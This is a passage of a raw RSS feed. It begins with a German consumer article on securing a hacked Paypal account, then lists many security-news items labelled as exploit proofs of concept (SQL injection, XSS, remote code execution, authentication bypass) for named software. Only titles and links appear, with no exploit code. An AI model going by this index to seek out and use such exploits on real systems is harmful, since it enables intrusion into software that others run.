data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Im ersten Schritt sollten Sie unbedingt Ihr Paypal-Passwort ändern.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Wenn Sie vermuten, dass Ihr Paypal-Konto gehackt wurde, oder wenn Sie sogar schon <strong>unbefugte Transaktionen</strong> sehen, dann zählt jede Minute. Gehen Sie sofort diese Schritte durch:</p>



<ol start="1" class="wp-block-list">
<li><strong>Passwort ändern</strong><br>Melden Sie sich umgehend bei <a href="https://www.paypal.com/de/webapps/mpp/home" target="_blank" rel="noreferrer noopener">Paypal</a> an und vergeben Sie ein neues, starkes Passwort: Oben rechts auf das <em>Zahnrad-Symbol -&gt; Sicherheit -&gt; Passwort -&gt; Aktualisieren</em>. Wichtig: Falls Sie dasselbe Passwort auch für Ihr E-Mail-Konto oder andere Dienste genutzt haben, ändern Sie es dort ebenfalls umgehend. <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">Nutzen Sie am besten einen guten Passwort-Manager</a>.<br><br></li>



<li><strong>Zwei-Faktor-Authentifizierung aktivieren</strong><br>Richten Sie die 2FA in den Sicherheitseinstellungen von Paypal ein. Am sichersten ist die Anmeldung per Authenticator-App, nicht nur per SMS. Damit verhindern Sie, dass Angreifer allein mit Ihrem Passwort Zugriff auf Ihr Konto bekommen. Die „Zweistufige Verifizierung“ finden Sie ebenfalls unter „Sicherheit“.<br><br></li>



<li><strong>Zahlungen überprüfen</strong><br>Gehen Sie Ihre letzten Transaktionen bei Paypal und auf dem verknüpften Bankkonto oder Ihrer Kreditkarte sorgfältig durch. Je früher Sie Unregelmäßigkeiten entdecken, desto schneller können Sie reagieren. Ihre Bezahl-Historie finden Sie unter „Aktivitäten“.<br><br></li>



<li><strong>Unbefugte Zahlungen melden</strong><br>Nutzen Sie die Konfliktlösung von Paypal, um verdächtige Abbuchungen zu reklamieren. Paypal prüft den Fall und erstattet in vielen Fällen das Geld zurück.<br><br></li>



<li><strong>Fremde Geräte abmelden</strong><br>Wenn Sie den Verdacht haben, dass jemand unbefugt auf Ihr Paypal-Konto zugegriffen hat, sollten Sie <strong>sofort alle fremden Sitzungen beenden</strong>. Gehen Sie dazu in die <strong>Sicherheitseinstellungen</strong> Ihres Kontos: Unter <em>Sicherheit</em> -&gt; <em>Logins verwalten</em> sehen Sie eine Liste aller aktiven Logins. Prüfen Sie die aufgeführten Geräte und melden Sie alles ab, was Ihnen unbekannt vorkommt. Mit einem Klick auf <strong>„Entfernen“</strong> kappen Sie den Zugriff von Hackern sofort.<br><br></li>



<li><strong>Vorfall bei Paypal melden und Support kontaktieren</strong><br>Wenn Sie unbefugte Aktivitäten auf Ihrem Paypal-Konto entdecken, sollten Sie den Vorfall <strong>sofort melden</strong>. Gehen Sie dazu ins Menü <strong>Aktivitäten</strong>, wählen Sie die verdächtige Transaktion aus und klicken Sie anschließend auf <strong>„Problem melden“</strong>. Folgen Sie den angezeigten Schritten – Paypal prüft den Vorfall und kann unautorisierte Zahlungen erstatten. Gleichzeitig lohnt sich der direkte Kontakt mit dem <a href="https://www.paypal.com/de/cshelp/contact-us" target="_blank" rel="noreferrer noopener">Paypal-Support</a>: Dort kann Ihr Konto zusätzlich abgesichert oder im Ernstfall vorübergehend gesperrt werden. Je schneller Sie reagieren, desto besser ist Ihr Konto geschützt und mögliche Schäden können vermieden werden.<br><br></li>



<li><strong>Bank und Kreditkartenanbieter informieren</strong><br>Falls schon Geld abgeflossen ist, setzen Sie auch Ihre Bank oder Ihr Kreditkarteninstitut in Kenntnis. Gegebenenfalls lassen Sie Karten sperren oder neue Zugangsdaten ausstellen. Nutzen Sie dafür die <strong>Sperrhotline 116 116</strong> (in Deutschland rund um die Uhr erreichbar), um Karten sofort zu sperren.</li>
</ol>



<p><strong>Lesetipp zum Thema: </strong><a href="https://www.pcwelt.de/article/2808935/paypal-kontaktloses-bezahlen-an-der-kasse-so-gehts.html" target="_blank" rel="noreferrer noopener">Mit Paypal kontaktlos an der Kasse bezahlen – so geht es</a></p>



<h2 class="wp-block-heading">Wie schütze ich mein Paypal-Konto richtig?</h2>



<p>Keine Frage: Ein gehacktes Konto ist der Super-GAU. Doch mit ein paar Vorkehrungen machen Sie es Betrügern extrem schwer, an Ihr Geld zu kommen. Diese Schutzmaßnahmen sind für Paypal essentiell:</p>



<p><strong>Ein starkes Passwort erstellen:</strong> Ihr Passwort ist der Schlüssel zu Ihrem Geld. Nutzen Sie eine lange Kombination aus Buchstaben, Zahlen und Sonderzeichen – und verwenden Sie das Passwort ausschließlich für Paypal. <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">Passwort-Manager</a> helfen, den Überblick zu behalten.</p>



<p><strong>Zwei-Faktor-Authentifizierung einschalten</strong>: Mit 2FA legen Sie ein zweites Schloss vor Ihr Konto. Am besten nutzen Sie eine Authenticator-App wie Google Authenticator oder Authy. Der SMS-Code ist besser als nichts, aber weniger sicher.</p>



<p><strong>Phishing erkennen</strong>: Die größte Gefahr kommt oft per Mail oder SMS. Merke: Paypal fragt <strong>niemals nach Ihrem Passwort</strong> oder fordert Sie per Link auf, sich einzuloggen. Tipp: Geben Sie die Paypal-Adresse im Zweifel lieber selbst ins Browserfenster ein, anstatt Links zu klicken.</p>



<p><strong>Nur auf sicheren Geräten einloggen</strong>: Öffentliches WLAN oder fremde Rechner sind ein Einfallstor für Hacker. Loggen Sie sich nur auf Ihren eigenen Geräten ein und halten Sie diese stets mit Updates aktuell.</p>



<p><strong>Benachrichtigungen aktivieren</strong>: Schalten Sie E-Mail- oder Push-Benachrichtigungen für Zahlungen ein. So merken Sie sofort, wenn jemand Unbefugtes versucht, Ihr Konto zu nutzen.</p>



<h2 class="wp-block-heading">Allgemeine Tipps zu Paypal</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"68b1acf5bf6f5"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/paypal-app-google-play2.png" alt="paypal app google play2" class="wp-image-2887863" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/08/paypal-app-google-play2.png?quality=50&amp;strip=all 1170w, https://b2c-contenthub.com/wp-content/uploads/2025/08/paypal-app-google-play2.png?resize=300%2C281&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/08/paypal-app-google-play2.png?resize=768%2C720&amp;quality=50&amp;strip=all 768w" width="1024" height="960" sizes="auto, (max-width: 1024px) 100vw, 1024px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Sicherer als der Browser: Mit der Paypal-App (<a href="https://play.google.com/store/apps/details?id=com.paypal.android.p2pmobile&amp;hl=de" target="_blank" rel="noreferrer noopener">Android</a> | <a href="https://apps.apple.com/de/app/paypal-geld-senden-verwalten/id283646709" target="_blank" rel="noreferrer noopener">iOS</a>) sind Nutzer besser vor Phishing geschützt.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Neben den reinen Sicherheitseinstellungen lohnt es sich, auch bei der täglichen Nutzung ein paar Dinge zu beachten. So sind Sie nicht nur vor Hackern besser geschützt, sondern auch vor typischen Betrugsfallen im Netz.</p>



<p><strong>Käuferschutz nutzen</strong><br>Paypal bietet einen Käuferschutz – nutzen Sie ihn. Zahlen Sie nur bei Händlern, die Paypal offiziell akzeptieren. Falls etwas schiefgeht (etwa Ware kommt nicht an oder ist völlig anders als beschrieben), können Sie Ihr Geld über das Konfliktlösungs-Center zurückholen.</p>



<p><strong>Nur an vertrauenswürdige Empfänger überweisen</strong><br>Geld „an Freunde senden“ klingt praktisch, bietet aber keinen Schutz. Nutzen Sie diese Option wirklich nur bei Personen, die Sie persönlich kennen – niemals bei Online-Verkäufern oder Fremden.</p>



<p><strong>E-Mail-Adresse aktuell halten</strong><br>Sicherheitswarnungen oder Bestätigungslinks landen auf der bei Paypal hinterlegten Adresse. Prüfen Sie regelmäßig, ob diese noch aktuell ist – und schützen Sie auch Ihr E-Mail-Konto mit einem starken Passwort und 2FA.</p>



<p><strong>App statt Browser verwenden</strong><br>Die offizielle Paypal-App ist oft sicherer als der Login im Browser. Sie unterstützt moderne Sicherheitsmechanismen, Push-Benachrichtigungen und macht Phishing-Angriffe weniger wahrscheinlich.</p>



<p><strong>Kontobewegungen im Blick behalten</strong><br>Ein kurzer Blick in die App oder ins Online-Konto zwischendurch kann viel Ärger ersparen. So erkennen Sie verdächtige Aktivitäten, bevor es teuer wird.</p>



<h2 class="wp-block-heading">Fazit</h2>



<p>Ein gehacktes Papal-Konto kann sich anfühlen wie ein Einbruch in die eigene Wohnung. Doch mit den richtigen Schritten schließen Sie die Tür schnell wieder ab – und rüsten Ihr digitales Schloss so auf, dass Einbrecher draußen bleiben.</p>



<p>Unser Tipp zum Schluss: <strong>Bleiben Sie wachsam und handeln Sie sofort</strong>, wenn etwas nicht stimmt. So behalten Sie nicht nur Ihr Geld, sondern auch das gute Gefühl, Ihr Konto jederzeit unter Kontrolle zu haben.</p>



<p><strong>Übrigens:</strong> Sicherheit auf Ihren Geräten schützt nicht nur Ihre Daten, sondern auch Ihr Paypal-Konto. Ein aktuelles Antivirus-Programm und regelmäßige Updates machen Hackerangriffe deutlich schwerer – mehr dazu in unserem <a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Ratgeber zu Antiviren-Software</a>.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] StoryChief Wordpress Plugin 1.0.42 - Arbitrary File Upload]]></title>
<description><![CDATA[StoryChief Wordpress Plugin 1.0.42 - Arbitrary File Upload]]></description>
<link>https://tsecurity.de/de/2957719/poc/webapps-storychief-wordpress-plugin-1042-arbitrary-file-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2957719/poc/webapps-storychief-wordpress-plugin-1042-arbitrary-file-upload/</guid>
<pubDate>Tue, 26 Aug 2025 08:08:01 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[StoryChief Wordpress Plugin 1.0.42 - Arbitrary File Upload]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure]]></title>
<description><![CDATA[Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure]]></description>
<link>https://tsecurity.de/de/2957695/poc/webapps-birth-chart-compatibility-wordpress-plugin-20-full-path-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2957695/poc/webapps-birth-chart-compatibility-wordpress-plugin-20-full-path-disclosure/</guid>
<pubDate>Tue, 26 Aug 2025 07:51:06 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Lingdang CRM 8.6.4.7 - SQL Injection]]></title>
<description><![CDATA[Lingdang CRM 8.6.4.7 - SQL Injection]]></description>
<link>https://tsecurity.de/de/2957694/poc/webapps-lingdang-crm-8647-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2957694/poc/webapps-lingdang-crm-8647-sql-injection/</guid>
<pubDate>Tue, 26 Aug 2025 07:51:05 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Lingdang CRM 8.6.4.7 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Lantronix Provisioning Manager 7.10.3 - XML External Entity Injection (XXE)]]></title>
<description><![CDATA[Lantronix Provisioning Manager 7.10.3 - XML External Entity Injection (XXE)]]></description>
<link>https://tsecurity.de/de/2945493/poc/webapps-lantronix-provisioning-manager-7103-xml-external-entity-injection-xxe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2945493/poc/webapps-lantronix-provisioning-manager-7103-xml-external-entity-injection-xxe/</guid>
<pubDate>Mon, 18 Aug 2025 14:52:12 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Lantronix Provisioning Manager 7.10.3 - XML External Entity Injection (XXE)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Soosyze CMS 2.0 - Brute Force Login]]></title>
<description><![CDATA[Soosyze CMS 2.0 - Brute Force Login]]></description>
<link>https://tsecurity.de/de/2945460/poc/webapps-soosyze-cms-20-brute-force-login/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2945460/poc/webapps-soosyze-cms-20-brute-force-login/</guid>
<pubDate>Mon, 18 Aug 2025 14:38:24 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Soosyze CMS 2.0 - Brute Force Login]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] RiteCMS 3.0.0 - Reflected Cross Site Scripting (XSS)]]></title>
<description><![CDATA[RiteCMS 3.0.0 - Reflected Cross Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/2945408/poc/webapps-ritecms-300-reflected-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2945408/poc/webapps-ritecms-300-reflected-cross-site-scripting-xss/</guid>
<pubDate>Mon, 18 Aug 2025 14:20:36 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[RiteCMS 3.0.0 - Reflected Cross Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] BigAnt Office Messenger 5.6.06 - SQL Injection]]></title>
<description><![CDATA[BigAnt Office Messenger 5.6.06 - SQL Injection]]></description>
<link>https://tsecurity.de/de/2945391/poc/webapps-bigant-office-messenger-5606-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2945391/poc/webapps-bigant-office-messenger-5606-sql-injection/</guid>
<pubDate>Mon, 18 Aug 2025 14:07:33 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[BigAnt Office Messenger 5.6.06 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] JetBrains TeamCity 2023.11.4 - Authentication Bypass]]></title>
<description><![CDATA[JetBrains TeamCity 2023.11.4 - Authentication Bypass]]></description>
<link>https://tsecurity.de/de/2934147/poc/webapps-jetbrains-teamcity-2023114-authentication-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2934147/poc/webapps-jetbrains-teamcity-2023114-authentication-bypass/</guid>
<pubDate>Mon, 11 Aug 2025 19:07:34 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[JetBrains TeamCity 2023.11.4 - Authentication Bypass]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Ghost CMS 5.59.1 - Arbitrary File Read]]></title>
<description><![CDATA[Ghost CMS 5.59.1 - Arbitrary File Read]]></description>
<link>https://tsecurity.de/de/2934117/poc/webapps-ghost-cms-5591-arbitrary-file-read/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2934117/poc/webapps-ghost-cms-5591-arbitrary-file-read/</guid>
<pubDate>Mon, 11 Aug 2025 18:53:07 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ghost CMS 5.59.1 - Arbitrary File Read]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)]]></title>
<description><![CDATA[VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/2934115/poc/webapps-vmware-vsphere-client-8030-reflected-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2934115/poc/webapps-vmware-vsphere-client-8030-reflected-cross-site-scripting-xss/</guid>
<pubDate>Mon, 11 Aug 2025 18:53:04 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Ghost CMS 5.42.1 - Path Traversal]]></title>
<description><![CDATA[Ghost CMS 5.42.1 - Path Traversal]]></description>
<link>https://tsecurity.de/de/2934114/poc/webapps-ghost-cms-5421-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2934114/poc/webapps-ghost-cms-5421-path-traversal/</guid>
<pubDate>Mon, 11 Aug 2025 18:53:03 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ghost CMS 5.42.1 - Path Traversal]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] ServiceNow Multiple Versions - Input Validation & Template Injection]]></title>
<description><![CDATA[ServiceNow Multiple Versions - Input Validation & Template Injection]]></description>
<link>https://tsecurity.de/de/2934113/poc/webapps-servicenow-multiple-versions-input-validation-template-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2934113/poc/webapps-servicenow-multiple-versions-input-validation-template-injection/</guid>
<pubDate>Mon, 11 Aug 2025 18:53:01 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ServiceNow Multiple Versions - Input Validation &amp; Template Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Grav CMS 1.7.48 - Remote Code Execution (RCE)]]></title>
<description><![CDATA[Grav CMS 1.7.48 - Remote Code Execution (RCE)]]></description>
<link>https://tsecurity.de/de/2933995/poc/webapps-grav-cms-1748-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2933995/poc/webapps-grav-cms-1748-remote-code-execution-rce/</guid>
<pubDate>Mon, 11 Aug 2025 17:51:00 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Grav CMS 1.7.48 - Remote Code Execution (RCE)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Microsoft Edge Renderer Process (Mojo IPC) 134.0.6998.177 - Sandbox Escape]]></title>
<description><![CDATA[Microsoft Edge Renderer Process (Mojo IPC) 134.0.6998.177 - Sandbox Escape]]></description>
<link>https://tsecurity.de/de/2933994/poc/webapps-microsoft-edge-renderer-process-mojo-ipc-13406998177-sandbox-escape/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2933994/poc/webapps-microsoft-edge-renderer-process-mojo-ipc-13406998177-sandbox-escape/</guid>
<pubDate>Mon, 11 Aug 2025 17:50:58 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft Edge Renderer Process (Mojo IPC) 134.0.6998.177 - Sandbox Escape]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] atjiu pybbs 6.0.0 - Cross Site Scripting (XSS)]]></title>
<description><![CDATA[atjiu pybbs 6.0.0 - Cross Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/2933948/poc/webapps-atjiu-pybbs-600-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2933948/poc/webapps-atjiu-pybbs-600-cross-site-scripting-xss/</guid>
<pubDate>Mon, 11 Aug 2025 17:37:15 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[atjiu pybbs 6.0.0 - Cross Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] projectworlds Online Admission System 1.0 - SQL Injection]]></title>
<description><![CDATA[projectworlds Online Admission System 1.0 - SQL Injection]]></description>
<link>https://tsecurity.de/de/2933918/poc/webapps-projectworlds-online-admission-system-10-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2933918/poc/webapps-projectworlds-online-admission-system-10-sql-injection/</guid>
<pubDate>Mon, 11 Aug 2025 17:23:02 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[projectworlds Online Admission System 1.0 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[VX Guestbook 1.07 SQL Injection]]></title>
<description><![CDATA[Topic: VX Guestbook 1.07 SQL Injection Risk: Medium Text:# Exploit Title: VX Guestbook SQL Injection Authenticated  # Date: 2025-08-02  # Exploit Author: tmrswrr  # Category : Webapps ...]]></description>
<link>https://tsecurity.de/de/2923387/sicherheitsluecken/vx-guestbook-107-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2923387/sicherheitsluecken/vx-guestbook-107-sql-injection/</guid>
<pubDate>Tue, 05 Aug 2025 14:15:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: VX Guestbook 1.07 SQL Injection Risk: Medium Text:# Exploit Title: VX Guestbook SQL Injection Authenticated  # Date: 2025-08-02  # Exploit Author: tmrswrr  # Category : Webapps ...]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Ultimate Member WordPress Plugin 2.6.6 - Privilege Escalation]]></title>
<description><![CDATA[Ultimate Member WordPress Plugin 2.6.6 - Privilege Escalation]]></description>
<link>https://tsecurity.de/de/2919904/poc/webapps-ultimate-member-wordpress-plugin-266-privilege-escalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2919904/poc/webapps-ultimate-member-wordpress-plugin-266-privilege-escalation/</guid>
<pubDate>Sun, 03 Aug 2025 07:52:03 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ultimate Member WordPress Plugin 2.6.6 - Privilege Escalation]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] LPAR2RRD 8.04 - Remote Code Execution (RCE)]]></title>
<description><![CDATA[LPAR2RRD 8.04 - Remote Code Execution (RCE)]]></description>
<link>https://tsecurity.de/de/2919903/poc/webapps-lpar2rrd-804-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2919903/poc/webapps-lpar2rrd-804-remote-code-execution-rce/</guid>
<pubDate>Sun, 03 Aug 2025 07:52:02 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LPAR2RRD 8.04 - Remote Code Execution (RCE)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Gandia Integra Total 4.4.2236.1 - SQL Injection]]></title>
<description><![CDATA[Gandia Integra Total 4.4.2236.1 - SQL Injection]]></description>
<link>https://tsecurity.de/de/2919884/poc/webapps-gandia-integra-total-4422361-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2919884/poc/webapps-gandia-integra-total-4422361-sql-injection/</guid>
<pubDate>Sun, 03 Aug 2025 07:22:16 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Gandia Integra Total 4.4.2236.1 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)]]></title>
<description><![CDATA[Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/2919883/poc/webapps-copyparty-1186-reflected-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2919883/poc/webapps-copyparty-1186-reflected-cross-site-scripting-xss/</guid>
<pubDate>Sun, 03 Aug 2025 07:22:15 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Adobe ColdFusion 2023.6 - Remote File Read]]></title>
<description><![CDATA[Adobe ColdFusion 2023.6 - Remote File Read]]></description>
<link>https://tsecurity.de/de/2910316/poc/webapps-adobe-coldfusion-20236-remote-file-read/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2910316/poc/webapps-adobe-coldfusion-20236-remote-file-read/</guid>
<pubDate>Mon, 28 Jul 2025 20:51:38 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Adobe ColdFusion 2023.6 - Remote File Read]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Mezzanine CMS 6.1.0 - Stored Cross Site Scripting (XSS)]]></title>
<description><![CDATA[Mezzanine CMS 6.1.0 - Stored Cross Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/2910254/poc/webapps-mezzanine-cms-610-stored-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2910254/poc/webapps-mezzanine-cms-610-stored-cross-site-scripting-xss/</guid>
<pubDate>Mon, 28 Jul 2025 20:07:48 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mezzanine CMS 6.1.0 - Stored Cross Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Invision Community 4.7.20 - (calendar/view.php) SQL Injection]]></title>
<description><![CDATA[Invision Community 4.7.20 - (calendar/view.php) SQL Injection]]></description>
<link>https://tsecurity.de/de/2910234/poc/webapps-invision-community-4720-calendarviewphp-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2910234/poc/webapps-invision-community-4720-calendarviewphp-sql-injection/</guid>
<pubDate>Mon, 28 Jul 2025 19:50:19 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Invision Community 4.7.20 - (calendar/view.php) SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] XWiki 14 - SQL Injection via getdeleteddocuments.vm]]></title>
<description><![CDATA[XWiki 14 - SQL Injection via getdeleteddocuments.vm]]></description>
<link>https://tsecurity.de/de/2910233/poc/webapps-xwiki-14-sql-injection-via-getdeleteddocumentsvm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2910233/poc/webapps-xwiki-14-sql-injection-via-getdeleteddocumentsvm/</guid>
<pubDate>Mon, 28 Jul 2025 19:50:18 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[XWiki 14 - SQL Injection via getdeleteddocuments.vm]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function]]></title>
<description><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function]]></description>
<link>https://tsecurity.de/de/2899749/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-the-chat-transfer-function/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899749/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-the-chat-transfer-function/</guid>
<pubDate>Tue, 22 Jul 2025 12:07:28 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field]]></title>
<description><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field]]></description>
